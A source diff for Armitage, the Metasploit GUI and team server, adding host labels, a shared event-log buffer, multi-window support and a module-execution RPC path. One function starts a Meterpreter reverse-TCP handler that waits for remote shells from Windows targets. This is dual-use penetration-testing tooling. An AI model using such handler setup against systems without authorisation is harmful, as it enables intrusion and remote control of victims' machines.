||||
$address = [$client getLocalAddress];
|
||||
}
|
||||
call_async($client, "db.log_event", "$address $+ // $+ $eid", $data);
|
||||
writeObject($handle, result(%()));
|
||||
}
|
||||
else if ($method eq "armitage.skip") {
|
||||
acquire($poll_lock);
|
||||
$index = size(@events);
|
||||
release($poll_lock);
|
||||
[$events get: $eid];
|
||||
writeObject($handle, result(%()));
|
||||
}
|
||||
else if ($method eq "armitage.poll" || $method eq "armitage.push") {
|
||||
acquire($poll_lock);
|
||||
if ($method eq "armitage.push") {
|
||||
($null, $data) = $args;
|
||||
foreach $temp (split("\n", $data)) {
|
||||
push(@events, formatDate("HH:mm:ss") . " < $+ $[10]eid $+ > " . $data);
|
||||
[$events put: formatDate("HH:mm:ss") . " < $+ $[10]eid $+ > " . $data];
|
||||
}
|
||||
}
|
||||
|
||||
if (size(@events) > $index) {
|
||||
$rv = result(%(data => join("", sublist(@events, $index)), encoding => "base64", prompt => "$eid $+ > "));
|
||||
$index = size(@events);
|
||||
}
|
||||
else {
|
||||
$rv = result(%(data => "", prompt => "$eid $+ > ", encoding => "base64"));
|
||||
}
|
||||
release($poll_lock);
|
||||
|
||||
$rv = result(%(data => [$events get: $eid], encoding => "base64", prompt => "$eid $+ > "));
|
||||
writeObject($handle, $rv);
|
||||
}
|
||||
else if ($method eq "armitage.lusers") {
|
||||
$rv = [new HashMap];
|
||||
[$rv put: "lusers", [$events clients]];
|
||||
writeObject($handle, $rv);
|
||||
}
|
||||
else if ($method eq "armitage.append") {
|
||||
|
@ -308,6 +293,10 @@ sub client {
|
|||
$response = [$client execute: $method, cast($args, ^Object)];
|
||||
writeObject($handle, $response);
|
||||
}
|
||||
else if ($method eq "module.execute_direct") {
|
||||
$response = [$client execute: "module.execute", cast($args, ^Object)];
|
||||
writeObject($handle, $response);
|
||||
}
|
||||
else if ($method in %async) {
|
||||
if ($args) {
|
||||
[$client execute_async: $method, cast($args, ^Object)];
|
||||
|
@ -333,6 +322,7 @@ sub client {
|
|||
|
||||
if ($eid !is $null) {
|
||||
event("*** $eid left.\n");
|
||||
[$events free: $eid];
|
||||
}
|
||||
|
||||
# reset the user's filter...
|
||||
|
@ -355,7 +345,7 @@ sub client {
|
|||
|
||||
sub main {
|
||||
global('$client $mclient');
|
||||
local('$server %sessions $sess_lock $read_lock $poll_lock $lock_lock %locks %readq $id @events $error $auth %cache $cach_lock $client_cache $handle $console');
|
||||
local('$server %sessions $sess_lock $read_lock $lock_lock %locks %readq $id $error $auth %cache $cach_lock $client_cache $handle $console $events');
|
||||
|
||||
$auth = unpack("H*", digest(rand() . ticks(), "MD5"))[0];
|
||||
|
||||
|
@ -403,9 +393,6 @@ sub main {
|
|||
# we need this global to be set so our reverse listeners work as expected.
|
||||
$MY_ADDRESS = $host;
|
||||
|
||||
# make sure clients know a team server is present. can't happen async.
|
||||
call($client, "core.setg", "ARMITAGE_TEAM", '1');
|
||||
|
||||
#
|
||||
# setup the client cache
|
||||
#
|
||||
|
@ -416,10 +403,12 @@ sub main {
|
|||
#
|
||||
$sess_lock = semaphore(1);
|
||||
$read_lock = semaphore(1);
|
||||
$poll_lock = semaphore(1);
|
||||
$lock_lock = semaphore(1);
|
||||
$cach_lock = semaphore(1);
|
||||
|
||||
# setup any shared buffers...
|
||||
$events = [new armitage.ArmitageBuffer: 250];
|
||||
|
||||
# set the LHOST to whatever the user specified (use console.write to make the string not UTF-8)
|
||||
$console = createConsole($client);
|
||||
call($client, "console.write", $console, "setg LHOST $host $+ \n");
|
||||
|
@ -427,6 +416,9 @@ sub main {
|
|||
# absorb the output of this command which is LHOST => ...
|
||||
call($client, "console.read", $console);
|
||||
|
||||
# update server's understanding of this value...
|
||||
call($client, "armitage.set_ip", $host);
|
||||
|
||||
#
|
||||
# create a thread to push console messages to the event queue for all clients.
|
||||
#
|
||||
|
@ -436,12 +428,10 @@ sub main {
|
|||
sleep(2000);
|
||||
$r = call($client, "console.read", $console);
|
||||
if ($r["data"] ne "") {
|
||||
acquire($poll_lock);
|
||||
push(@events, formatDate("HH:mm:ss") . " " . $r["data"]);
|
||||
release($poll_lock);
|
||||
[$events put: formatDate("HH:mm:ss") . " " . $r["data"]];
|
||||
}
|
||||
}
|
||||
}, \$client, \$poll_lock, \@events, \$console);
|
||||
}, \$client, \$events, \$console);
|
||||
|
||||
#
|
||||
# Create a shared hash that contains a thread for each session...
|
||||
|
@ -538,7 +528,7 @@ service framework-postgres start");
|
|||
$handle = [$server accept];
|
||||
if ($handle !is $null) {
|
||||
%readq[$id] = %();
|
||||
fork(&client, \$client, \$handle, \%sessions, \$read_lock, \$sess_lock, \$poll_lock, $queue => %readq[$id], \$id, \@events, \$auth, \%locks, \$lock_lock, \$cach_lock, \%cache, \$motd, \$client_cache, $_user => $user, $_pass => $pass);
|
||||
fork(&client, \$client, \$handle, \%sessions, \$read_lock, \$sess_lock, $queue => %readq[$id], \$id, \$events, \$auth, \%locks, \$lock_lock, \$cach_lock, \%cache, \$motd, \$client_cache, $_user => $user, $_pass => $pass);
|
||||
|
||||
$id++;
|
||||
}
|
||||
|
|
|
@ -21,6 +21,10 @@ sub getHostOS {
|
|||
return iff($1 in %hosts, %hosts[$1]['os_name'], $null);
|
||||
}
|
||||
|
||||
sub getHostLabel {
|
||||
return iff($1 in %hosts, %hosts[$1]['label'], $null);
|
||||
}
|
||||
|
||||
sub getSessions {
|
||||
return iff($1 in %hosts && 'sessions' in %hosts[$1], %hosts[$1]['sessions']);
|
||||
}
|
||||
|
@ -122,7 +126,7 @@ on sessions {
|
|||
}
|
||||
|
||||
if ($host['show'] eq "1") {
|
||||
push(@nodes, @($id, describeHost($host), showHost($host), $tooltip));
|
||||
push(@nodes, @($id, $host['label'] . "", describeHost($host), showHost($host), $tooltip));
|
||||
}
|
||||
}
|
||||
|
||||
|
@ -130,14 +134,14 @@ on sessions {
|
|||
}
|
||||
|
||||
sub refreshGraph {
|
||||
local('$node $id $description $icons $tooltip $highlight');
|
||||
local('$node $id $label $description $icons $tooltip $highlight');
|
||||
|
||||
# update everything...
|
||||
[$graph start];
|
||||
# do the hosts?
|
||||
foreach $node (@nodes) {
|
||||
($id, $description, $icons, $tooltip) = $node;
|
||||
[$graph addNode: $id, $description, $icons, $tooltip];
|
||||
($id, $label, $description, $icons, $tooltip) = $node;
|
||||
[$graph addNode: $id, $label, $description, $icons, $tooltip];
|
||||
}
|
||||
|
||||
# update the routes
|
||||
|
@ -189,6 +193,11 @@ on hosts {
|
|||
$address = $host['address'];
|
||||
if ($address in %hosts && size(%hosts[$address]) > 1) {
|
||||
%newh[$address] = %hosts[$address];
|
||||
|
||||
# set the label to empty b/c team server won't add labels if there are no labels. This fixes
|
||||
# a corner case where a user might clear all labels and find they won't go away
|
||||
%newh[$address]['label'] = '';
|
||||
|
||||
putAll(%newh[$address], keys($host), values($host));
|
||||
|
||||
if ($host['os_name'] eq "") {
|
||||
|
@ -258,7 +267,7 @@ sub _importHosts {
|
|||
}
|
||||
|
||||
$console = createDisplayTab("Import", $file => "import");
|
||||
[$console addCommand: $null, "db_import " . strrep(join(" ", $files), "\\", "\\\\")];
|
||||
[$console addCommand: 'x', "db_import " . strrep(join(" ", $files), "\\", "\\\\")];
|
||||
[$console addListener: lambda({
|
||||
elog("imported hosts from $success file" . iff($success != 1, "s"));
|
||||
}, \$success)];
|
||||
|
@ -342,8 +351,10 @@ sub clearHostFunction {
|
|||
}
|
||||
|
||||
sub clearDatabase {
|
||||
elog("cleared the database");
|
||||
call_async($mclient, "db.clear");
|
||||
if (!askYesNo("This action will clear the database. You will lose all information\ncollected up to this point. You will not be able toget it back.\nWould you like to clear the database?", "Clear Database")) {
|
||||
elog("cleared the database");
|
||||
call_async($mclient, "db.clear");
|
||||
}
|
||||
}
|
||||
|
||||
# called when a target is clicked on...
|
||||
|
|
|
@ -151,6 +151,11 @@ sub createConsoleTab {
|
|||
}
|
||||
|
||||
sub setg {
|
||||
# update team server's understanding of LHOST
|
||||
if ($1 eq "LHOST") {
|
||||
call_async($client, "armitage.set_ip", $2);
|
||||
}
|
||||
|
||||
%MSF_GLOBAL[$1] = $2;
|
||||
local('$c');
|
||||
$c = createConsole($client);
|
||||
|
@ -159,12 +164,15 @@ sub setg {
|
|||
}
|
||||
|
||||
sub createDefaultHandler {
|
||||
warn("Creating a default reverse handler...");
|
||||
# setup a handler for meterpreter
|
||||
setg("LPORT", randomPort());
|
||||
local('$port');
|
||||
$port = randomPort();
|
||||
setg("LPORT", $port);
|
||||
warn("Creating a default reverse handler... 0.0.0.0: $+ $port");
|
||||
call_async($client, "module.execute", "exploit", "multi/handler", %(
|
||||
PAYLOAD => "windows/meterpreter/reverse_tcp",
|
||||
LHOST => "0.0.0.0",
|
||||
LPORT => $port,
|
||||
ExitOnSession => "false"
|
||||
));
|
||||
}
|
||||
|
@ -307,7 +315,12 @@ sub startMetasploit {
|
|||
savePreferences();
|
||||
}
|
||||
|
||||
$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null];
|
||||
if ("*apps*pro*" iswm $msfdir) {
|
||||
$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd_new.bat"), $null];
|
||||
}
|
||||
else {
|
||||
$handle = [SleepUtils getIOHandle: resource("resources/msfrpcd.bat"), $null];
|
||||
}
|
||||
$data = join("\r\n", readAll($handle, -1));
|
||||
closef($handle);
|
||||
|
||||
|
@ -373,7 +386,7 @@ sub connectDialog {
|
|||
$msfrpc_handle = $null;
|
||||
}
|
||||
|
||||
local('$dialog $host $port $ssl $user $pass $button $cancel $start $center $help $helper');
|
||||
local('$dialog $host $port $ssl $user $pass $button $start $center $help $helper');
|
||||
$dialog = window("Connect...", 0, 0);
|
||||
|
||||
# setup our nifty form fields..
|
||||
|
@ -390,8 +403,6 @@ sub connectDialog {
|
|||
$help = [new JButton: "Help"];
|
||||
[$help setToolTipText: "<html>Use this button to view the Getting Started Guide on the Armitage homepage</html>"];
|
||||
|
||||
$cancel = [new JButton: "Exit"];
|
||||
|
||||
# lay them out
|
||||
|
||||
$center = [new JPanel];
|
||||
|
@ -414,9 +425,14 @@ sub connectDialog {
|
|||
($h, $p, $u, $s) = @o;
|
||||
|
||||
[$dialog setVisible: 0];
|
||||
connectToMetasploit($h, $p, $u, $s);
|
||||
|
||||
if ($h eq "127.0.0.1" || $h eq "localhost") {
|
||||
if ($h eq "127.0.0.1" || $h eq "::1" || $h eq "localhost") {
|
||||
if ($__frame__ && [$__frame__ checkLocal]) {
|
||||
showError("You can't connect to localhost twice");
|
||||
[$dialog setVisible: 1];
|
||||
return;
|
||||
}
|
||||
|
||||
try {
|
||||
closef(connect("127.0.0.1", $p, 1000));
|
||||
}
|
||||
|
@ -426,37 +442,33 @@ sub connectDialog {
|
|||
}
|
||||
}
|
||||
}
|
||||
|
||||
connectToMetasploit($h, $p, $u, $s);
|
||||
}, \$dialog, \$host, \$port, \$user, \$pass)];
|
||||
|
||||
[$help addActionListener: gotoURL("http://www.fastandeasyhacking.com/start")];
|
||||
|
||||
[$cancel addActionListener: {
|
||||
[System exit: 0];
|
||||
}];
|
||||
|
||||
[$dialog pack];
|
||||
[$dialog setLocationRelativeTo: $null];
|
||||
[$dialog setVisible: 1];
|
||||
}
|
||||
|
||||
sub _elog {
|
||||
sub elog {
|
||||
local('$2');
|
||||
if ($client !is $mclient) {
|
||||
# $2 can be NULL here. team server will populate it...
|
||||
call_async($mclient, "armitage.log", $1, $2);
|
||||
}
|
||||
else {
|
||||
# since we're not on a team server, no one else will have
|
||||
# overwritten LHOST, so we can trust $MY_ADDRESS to be current
|
||||
if ($2 is $null) {
|
||||
$2 = $MY_ADDRESS;
|
||||
}
|
||||
call_async($client, "db.log_event", "$2 $+ //", $1);
|
||||
}
|
||||
}
|
||||
|
||||
sub elog {
|
||||
local('$2');
|
||||
if ($2 is $null) {
|
||||
$2 = $MY_ADDRESS;
|
||||
}
|
||||
|
||||
_elog($1, $2);
|
||||
}
|
||||
|
||||
sub module_execute {
|
||||
return invoke(&_module_execute, filter_data_array("user_launch", @_));
|
||||
}
|
||||
|
|
|
@ -33,7 +33,7 @@ sub listWorkspaces {
|
|||
$dialog = [new JPanel];
|
||||
[$dialog setLayout: [new BorderLayout]];
|
||||
|
||||
($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "session"), @());
|
||||
($table, $model) = setupTable("name", @("name", "hosts", "ports", "os", "labels", "session"), @());
|
||||
updateWorkspaceList($table, $model);
|
||||
[$table setSelectionMode: [ListSelectionModel MULTIPLE_INTERVAL_SELECTION]];
|
||||
|
||||
|
@ -88,15 +88,16 @@ sub workspaceDialog {
|
|||
local('$table $model');
|
||||
($table, $model) = $2;
|
||||
|
||||
local('$dialog $name $host $ports $os $button $session');
|
||||
local('$dialog $name $host $ports $os $button $session $label');
|
||||
$dialog = dialog($title, 640, 480);
|
||||
[$dialog setLayout: [new GridLayout: 6, 1]];
|
||||
[$dialog setLayout: [new GridLayout: 7, 1]];
|
||||
|
||||
$name = [new ATextField: $1['name'], 16];
|
||||
[$name setEnabled: $enable];
|
||||
$host = [new ATextField: $1['hosts'], 16];
|
||||
$ports = [new ATextField: $1['ports'], 16];
|
||||
$os = [new ATextField: $1['os'], 16];
|
||||
$label = [new ATextField: $1['labels'], 16];
|
||||
$session = [new JCheckBox: "Hosts with sessions only"];
|
||||
if ($1['session'] eq 1) {
|
||||
[$session setSelected: 1];
|
||||
|
@ -108,6 +109,7 @@ sub workspaceDialog {
|
|||
[$dialog add: label_for("Hosts:", 60, $host)];
|
||||
[$dialog add: label_for("Ports:", 60, $ports)];
|
||||
[$dialog add: label_for("OS:", 60, $os)];
|
||||
[$dialog add: label_for("Labels:", 60, $label)];
|
||||
[$dialog add: $session];
|
||||
|
||||
[$dialog add: center($button)];
|
||||
|
@ -116,15 +118,16 @@ sub workspaceDialog {
|
|||
|
||||
[$button addActionListener: lambda({
|
||||
# yay, we have a dialog...
|
||||
local('$n $h $p $o $s @workspaces $ws $temp');
|
||||
local('$n $h $p $o $s $l @workspaces $ws $temp');
|
||||
$n = [[$name getText] trim];
|
||||
$h = [strrep([$host getText], '*', '%', '?', '_') trim];
|
||||
$p = [[$ports getText] trim];
|
||||
$o = [strrep([$os getText], '*', '%', '?', '_') trim];
|
||||
$l = [[$label getText] trim];
|
||||
$s = [$session isSelected];
|
||||
|
||||
# save the new menu
|
||||
$ws = workspace($n, $h, $p, $o, $s);
|
||||
$ws = workspace($n, $h, $p, $o, $s, $l);
|
||||
@workspaces = workspaces();
|
||||
foreach $temp (@workspaces) {
|
||||
if ($temp["name"] eq $n) {
|
||||
|
@ -140,7 +143,7 @@ sub workspaceDialog {
|
|||
updateWorkspaceList($table, $model);
|
||||
|
||||
[$dialog setVisible: 0];
|
||||
}, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model)];
|
||||
}, \$dialog, \$host, \$ports, \$os, \$name, \$session, \$table, \$model, \$label)];
|
||||
}
|
||||
|
||||
sub reset_workspace {
|
||||
|
@ -199,16 +202,16 @@ sub set_workspace {
|
|||
}
|
||||
|
||||
sub workspace {
|
||||
return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5);
|
||||
return ohash(name => $1, hosts => $2, ports => $3, os => $4, session => $5, labels => $6);
|
||||
}
|
||||
|
||||
sub workspaces {
|
||||
local('$ws @r $name $host $port $os $session $workspace');
|
||||
local('$ws @r $name $host $port $os $session $workspace $label');
|
||||
$ws = split("!!", [$preferences getProperty: "armitage.workspaces.menus", ""]);
|
||||
foreach $workspace ($ws) {
|
||||
if ($workspace ne "") {
|
||||
($name, $host, $port, $os, $session) = split('@@', $workspace);
|
||||
push(@r, workspace($name, $host, $port, $os, $session));
|
||||
($name, $host, $port, $os, $session, $label) = split('@@', $workspace);
|
||||
push(@r, workspace($name, $host, $port, $os, $session, $label));
|
||||
}
|
||||
}
|
||||
return @r;
|
||||
|
|
|
@ -13,13 +13,32 @@ import cortana.gui.MenuBuilder;
|
|||
|
||||
import ui.*;
|
||||
|
||||
public class ArmitageApplication extends JFrame {
|
||||
public class ArmitageApplication extends JComponent {
|
||||
protected JTabbedPane tabs = null;
|
||||
protected JSplitPane split = null;
|
||||
protected JMenuBar menus = new JMenuBar();
|
||||
protected ScreenshotManager screens = null;
|
||||
protected KeyBindings keys = new KeyBindings();
|
||||
protected MenuBuilder builder = null;
|
||||
protected String title = "";
|
||||
protected MultiFrame window = null;
|
||||
|
||||
public KeyBindings getBindings() {
|
||||
return keys;
|
||||
}
|
||||
|
||||
public void setTitle(String title) {
|
||||
this.title = title;
|
||||
window.setTitle(this, title);
|
||||
}
|
||||
|
||||
public String getTitle() {
|
||||
return title;
|
||||
}
|
||||
|
||||
public void setIconImage(Image blah) {
|
||||
window.setIconImage(blah);
|
||||
}
|
||||
|
||||
public void setScreenshotManager(ScreenshotManager m) {
|
||||
screens = m;
|
||||
|
@ -192,10 +211,11 @@ public class ArmitageApplication extends JFrame {
|
|||
|
||||
/* pop goes the tab! */
|
||||
final JFrame r = new JFrame(t.title);
|
||||
r.setIconImages(getIconImages());
|
||||
//r.setIconImages(getIconImages());
|
||||
r.setLayout(new BorderLayout());
|
||||
r.add(t.component, BorderLayout.CENTER);
|
||||
r.pack();
|
||||
t.component.validate();
|
||||
|
||||
r.addWindowListener(new WindowAdapter() {
|
||||
public void windowClosing(WindowEvent ev) {
|
||||
|
@ -365,8 +385,20 @@ public class ArmitageApplication extends JFrame {
|
|||
component.requestFocusInWindow();
|
||||
}
|
||||
|
||||
public ArmitageApplication() {
|
||||
public void touch() {
|
||||
Component c = tabs.getSelectedComponent();
|
||||
if (c == null)
|
||||
return;
|
||||
|
||||
if (c instanceof Activity)
|
||||
((Activity)c).resetNotification();
|
||||
|
||||
c.requestFocusInWindow();
|
||||
}
|
||||
|
||||
public ArmitageApplication(MultiFrame f, String details, msf.RpcConnection conn) {
|
||||
super();
|
||||
window = f;
|
||||
tabs = new DraggableTabbedPane();
|
||||
setLayout(new BorderLayout());
|
||||
|
||||
|
@ -382,10 +414,8 @@ public class ArmitageApplication extends JFrame {
|
|||
/* add our tabbed pane */
|
||||
add(split, BorderLayout.CENTER);
|
||||
|
||||
/* setup our key bindings */
|
||||
KeyboardFocusManager.getCurrentKeyboardFocusManager().addKeyEventDispatcher(keys);
|
||||
|
||||
/* ... */
|
||||
setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
|
||||
//setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
|
||||
((ui.MultiFrame)window).addButton(details, this, conn);
|
||||
}
|
||||
}
|
||||
|
|
|
@ -0,0 +1,138 @@
|
|||
package armitage;
|
||||
|
||||
import java.util.*;
|
||||
|
||||
/*
|
||||
* Implement a thread safe store that any client may write to and
|
||||
* any client may read from (keeping track of their cursor into
|
||||
* the console)
|
||||
*/
|
||||
public class ArmitageBuffer {
|
||||
private static final class Message {
|
||||
public String message = null;
|
||||
public Message next = null;
|
||||
}
|
||||
|
||||
/* store our messages... */
|
||||
public Message first = null;
|
||||
public Message last = null;
|
||||
public long size = 0;
|
||||
public long max = 0;
|
||||
public String prompt = "";
|
||||
|
||||
/* store indices into this buffer */
|
||||
public Map indices = new HashMap();
|
||||
|
||||
/* setup the buffer?!? :) */
|
||||
public ArmitageBuffer(long max) {
|
||||
this.max = max;
|
||||
}
|
||||
|
||||
/* store a prompt with this buffer... we're not going to do any indexing magic for now */
|
||||
public String getPrompt() {
|
||||
synchronized (this) {
|
||||
return prompt;
|
||||
}
|
||||
}
|
||||
|
||||
/* set the prompt */
|
||||
public void setPrompt(String text) {
|
||||
synchronized (this) {
|
||||
prompt = text;
|
||||
}
|
||||
}
|
||||
|
||||
/* post a message to this buffer */
|
||||
public void put(String text) {
|
||||
synchronized (this) {
|
||||
/* create our message */
|
||||
Message m = new Message();
|
||||
m.message = text;
|
||||
|
||||
/* store our message */
|
||||
if (last == null && first == null) {
|
||||
first = m;
|
||||
last = m;
|
||||
}
|
||||
else {
|
||||
last.next = m;
|
||||
last = m;
|
||||
}
|
||||
|
||||
/* increment number of stored messages */
|
||||
size += 1;
|
||||
|
||||
/* limit the total number of past messages to the max size */
|
||||
if (size > max) {
|
||||
first = first.next;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/* retrieve a set of all clients consuming this buffer */
|
||||
public Collection clients() {
|
||||
synchronized (this) {
|
||||
LinkedList clients = new LinkedList(indices.keySet());
|
||||
return clients;
|
||||
}
|
||||
}
|
||||
|
||||
/* free a client */
|
||||
public void free(String id) {
|
||||
synchronized (this) {
|
||||
indices.remove(id);
|
||||
}
|
||||
}
|
||||
|
||||
/* reset our indices too */
|
||||
public void reset() {
|
||||
synchronized (this) {
|
||||
first = null;
|
||||
last = null;
|
||||
indices.clear();
|
||||
size = 0;
|
||||
}
|
||||
}
|
||||
|
||||
/* retrieve all messages available to the client (if any) */
|
||||
public String get(String id) {
|
||||
synchronized (this) {
|
||||
/* nadaz */
|
||||
if (first == null)
|
||||
return "";
|
||||
|
||||
/* get our index into the buffer */
|
||||
Message index = null;
|
||||
if (!indices.containsKey(id)) {
|
||||
index = first;
|
||||
}
|
||||
else {
|
||||
index = (Message)indices.get(id);
|
||||
|
||||
/* nothing happening */
|
||||
if (index.next == null)
|
||||
return "";
|
||||
|
||||
index = index.next;
|
||||
}
|
||||
|
||||
/* now let's walk through it */
|
||||
StringBuffer result = new StringBuffer();
|
||||
Message temp = index;
|
||||
while (temp != null) {
|
||||
result.append(temp.message);
|
||||
index = temp;
|
||||
temp = temp.next;
|
||||
}
|
||||
|
||||
/* store our index */
|
||||
indices.put(id, index);
|
||||
|
||||
return result.toString();
|
||||
}
|
||||
}
|
||||
|
||||
public String toString() {
|
||||
return "[" + size + " messages]";
|
||||
}
|
||||
}
|
|
@ -9,10 +9,10 @@ import sleep.engine.*;
|
|||
import sleep.parser.ParserConfig;
|
||||
|
||||
import java.util.*;
|
||||
|
||||
import java.io.*;
|
||||
|
||||
import cortana.core.*;
|
||||
import ui.*;
|
||||
|
||||
/**
|
||||
* This class launches Armitage and loads the scripts that are part of it.
|
||||
|
@ -101,7 +101,7 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
|
|||
};
|
||||
}
|
||||
|
||||
public ArmitageMain(String[] args) {
|
||||
public ArmitageMain(String[] args, MultiFrame window, boolean serverMode) {
|
||||
/* tweak the parser to recognize a few useful escapes */
|
||||
ParserConfig.installEscapeConstant('c', console.Colors.color + "");
|
||||
ParserConfig.installEscapeConstant('U', console.Colors.underline + "");
|
||||
|
@ -118,15 +118,6 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
|
|||
ScriptLoader loader = new ScriptLoader();
|
||||
loader.addSpecificBridge(this);
|
||||
|
||||
/* check for server mode option */
|
||||
boolean serverMode = false;
|
||||
|
||||
int x = 0;
|
||||
for (x = 0; x < args.length; x++) {
|
||||
if (args[x].equals("--server"))
|
||||
serverMode = true;
|
||||
}
|
||||
|
||||
/* setup Cortana event and filter bridges... we will install these into
|
||||
Armitage */
|
||||
if (!serverMode) {
|
||||
|
@ -135,6 +126,7 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
|
|||
|
||||
variables.putScalar("$__events__", SleepUtils.getScalar(events));
|
||||
variables.putScalar("$__filters__", SleepUtils.getScalar(filters));
|
||||
variables.putScalar("$__frame__", SleepUtils.getScalar(window));
|
||||
|
||||
loader.addGlobalBridge(events.getBridge());
|
||||
loader.addGlobalBridge(filters.getBridge());
|
||||
|
@ -142,7 +134,7 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
|
|||
|
||||
/* load the appropriate scripts */
|
||||
String[] scripts = serverMode ? getServerScripts() : getGUIScripts();
|
||||
|
||||
int x = -1;
|
||||
try {
|
||||
for (x = 0; x < scripts.length; x++) {
|
||||
InputStream i = this.getClass().getClassLoader().getResourceAsStream(scripts[x]);
|
||||
|
@ -161,6 +153,23 @@ public class ArmitageMain implements RuntimeWarningWatcher, Loadable, Function {
|
|||
}
|
||||
|
||||
public static void main(String args[]) {
|
||||
new ArmitageMain(args);
|
||||
/* check for server mode option */
|
||||
boolean serverMode = false;
|
||||
|
||||
int x = 0;
|
||||
for (x = 0; x < args.length; x++) {
|
||||
if (args[x].equals("--server"))
|
||||
serverMode = true;
|
||||
}
|
||||
|
||||
/* setup our armitage instance */
|
||||
if (serverMode) {
|
||||
new ArmitageMain(args, null, serverMode);
|
||||
}
|
||||
else {
|
||||
MultiFrame.setupLookAndFeel();
|
||||
MultiFrame frame = new MultiFrame();
|
||||
new ArmitageMain(args, frame, serverMode);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
|
|
@ -0,0 +1,60 @@
|
|||
package armitage;
|
||||
|
||||
import console.Console;
|
||||
import msf.*;
|
||||
import java.util.*;
|
||||
import java.awt.*;
|
||||
import java.awt.event.*;
|
||||
import javax.swing.*;
|
||||
|
||||
import java.io.IOException;
|
||||
|
||||
public class EventLogTabCompletion extends GenericTabCompletion {
|
||||
protected RpcConnection connection;
|
||||
|
||||
public EventLogTabCompletion(Console window, RpcConnection connection) {
|
||||
super(window);
|
||||
this.connection = connection;
|
||||
}
|
||||
|
||||
public Collection getOptions(String text) {
|
||||
try {
|
||||
Map response = (Map)connection.execute("armitage.lusers", new Object[] {});
|
||||
|
||||
if (response.get("lusers") == null)
|
||||
return null;
|
||||
|
||||
Iterator users = ((Collection)response.get("lusers")).iterator();
|
||||
|
||||
LinkedList options = new LinkedList();
|
||||
String word;
|
||||
String pre;
|
||||
|
||||
if (text.endsWith(" ")) {
|
||||
word = "";
|
||||
pre = text;
|
||||
}
|
||||
if (text.lastIndexOf(" ") != -1) {
|
||||
word = text.substring(text.lastIndexOf(" ") + 1);
|
||||
pre = text.substring(0, text.lastIndexOf(" ") + 1);
|
||||
}
|
||||
else {
|
||||
word = text;
|
||||
pre = "";
|
||||
}
|
||||
|
||||
while (users.hasNext()) {
|
||||
String user = users.next() + "";
|
||||
if (user.startsWith(word)) {
|
||||
options.add(pre + user);
|
||||
}
|
||||
}
|
||||
|
||||
return options;
|
||||
}
|
||||
catch (IOException ioex) {
|
||||
ioex.printStackTrace();
|
||||
}
|
||||
return null;
|
||||
}
|
||||
}
|
|
@ -15,7 +15,7 @@ public class Loader implements Loadable {
|
|||
protected ScriptLoader loader;
|
||||
protected Hashtable shared = new Hashtable();
|
||||
protected ScriptVariables vars = new ScriptVariables();
|
||||
protected Object[] passMe = new Object[2];
|
||||
protected Object[] passMe = new Object[3];
|
||||
protected List scripts = new LinkedList();
|
||||
|
||||
public void unsetDebugLevel(int flag) {
|
||||
|
@ -51,10 +51,11 @@ public class Loader implements Loadable {
|
|||
}
|
||||
}
|
||||
|
||||
public void passObjects(Object o, Object p) {
|
||||
public void passObjects(Object o, Object p, Object q) {
|
||||
synchronized (this) {
|
||||
passMe[0] = o;
|
||||
passMe[1] = p;
|
||||
passMe[2] = q;
|
||||
}
|
||||
}
|
||||
|
||||
|
|
|
@ -69,7 +69,7 @@ public class Main implements Runnable, CortanaPipe.CortanaPipeListener {
|
|||
try {
|
||||
Object conns[] = setupConnections(host, port, user, pass, nick);
|
||||
//new MsgRpcImpl(user, pass, host, Integer.parseInt(port), true, false);
|
||||
engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, host);
|
||||
engine = new Cortana((RpcConnection)conns[0], (RpcConnection)conns[1], scripts, (String)conns[2]);
|
||||
new Thread(this).start();
|
||||
}
|
||||
catch (java.lang.RuntimeException rex) {
|
||||
|
|
|
@ -453,17 +453,26 @@ public class NetworkGraph extends JComponent implements ActionListener {
|
|||
|
||||
protected Map tooltips = new HashMap();
|
||||
|
||||
public Object addNode(String id, String label, Image image, String tooltip) {
|
||||
public Object addNode(String id, String label, String description, Image image, String tooltip) {
|
||||
nodeImages.put(id, image);
|
||||
|
||||
if (label.length() > 0) {
|
||||
if (description.length() > 0) {
|
||||
description += "\n" + label;
|
||||
}
|
||||
else {
|
||||
description = label;
|
||||
}
|
||||
}
|
||||
|
||||
mxCell cell;
|
||||
if (!nodes.containsKey(id)) {
|
||||
cell = (mxCell)graph.insertVertex(parent, id, label, 0, 0, 125, 97);
|
||||
cell = (mxCell)graph.insertVertex(parent, id, description, 0, 0, 125, 97);
|
||||
nodes.put(id, cell);
|
||||
}
|
||||
else {
|
||||
cell = (mxCell)nodes.get(id);
|
||||
cell.setValue(label);
|
||||
cell.setValue(description);
|
||||
}
|
||||
nodes.touch(id);
|
||||
|
||||
|
|
|
@ -14,11 +14,15 @@ public class DatabaseImpl implements RpcConnection {
|
|||
protected String workspaceid = "0";
|
||||
protected String hFilter = null;
|
||||
protected String sFilter = null;
|
||||
protected String[] lFilter = null;
|
||||
protected Route[] rFilter = null;
|
||||
protected String[] oFilter = null;
|
||||
protected int hindex = 0;
|
||||
protected int sindex = 0;
|
||||
|
||||
/* keep track of labels associated with each host */
|
||||
protected Map labels = new HashMap();
|
||||
|
||||
/* define the maximum hosts in a workspace */
|
||||
protected int maxhosts = 512;
|
||||
|
||||
|
@ -135,6 +139,20 @@ public class DatabaseImpl implements RpcConnection {
|
|||
return false;
|
||||
}
|
||||
|
||||
private boolean checkLabel(String host) {
|
||||
if (!labels.containsKey(host))
|
||||
return false;
|
||||
|
||||
String label_l = (labels.get(host) + "").toLowerCase();
|
||||
|
||||
for (int x = 0; x < lFilter.length; x++) {
|
||||
if (label_l.indexOf(lFilter[x]) != -1) {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
return false;
|
||||
}
|
||||
|
||||
private boolean checkOS(String os) {
|
||||
String os_l = os.toLowerCase();
|
||||
|
||||
|
